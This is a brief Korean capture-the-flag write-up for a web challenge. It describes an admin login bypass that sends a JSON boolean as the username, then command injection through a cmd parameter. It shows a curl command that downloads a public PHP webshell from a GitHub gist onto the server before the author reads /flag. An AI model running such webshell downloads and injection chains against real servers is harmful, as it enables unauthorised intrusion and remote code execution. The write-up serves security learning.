[WEB] Switching Command

웹 페이지에 접속! username에 값들을 넣어보았다. 문자열을 넣으면 JSON형식으로 입력하라고 나오고, 숫자는 그냥 들어감. 이것저것 해보다가 웹 소스코드가 있다는 것을 잊었다는 게 생각났다.

index.php에서 admin으로 로그인하는 방법을 유추할 수 있다

사용자의 입력 값을 JSON 형태로 파싱하기 때문에 boolean 타입을 값으로 설정할 수 있다고 한다.

JSON 형태로 username을 넣어준다.

test.php 에서 cmd 파라미터에 웹쉘을 업로드한다.

(curl "https://gist.githubusercontent.com/joswr1ght/22f40787de19d80d110b37fb79ac3985/raw/50008b4501ccb7f804a61bc2e1a3d1df1cb403c4/easy-simple-php-webshell.php" -o hello.php)

hello.php로 가보면 업로드한 웹쉘이 실행되는 것을 알 수 있다.

OS 명령어를 입력하면 결과가 출력된다.

/flag를 통해 flag를 출력한다.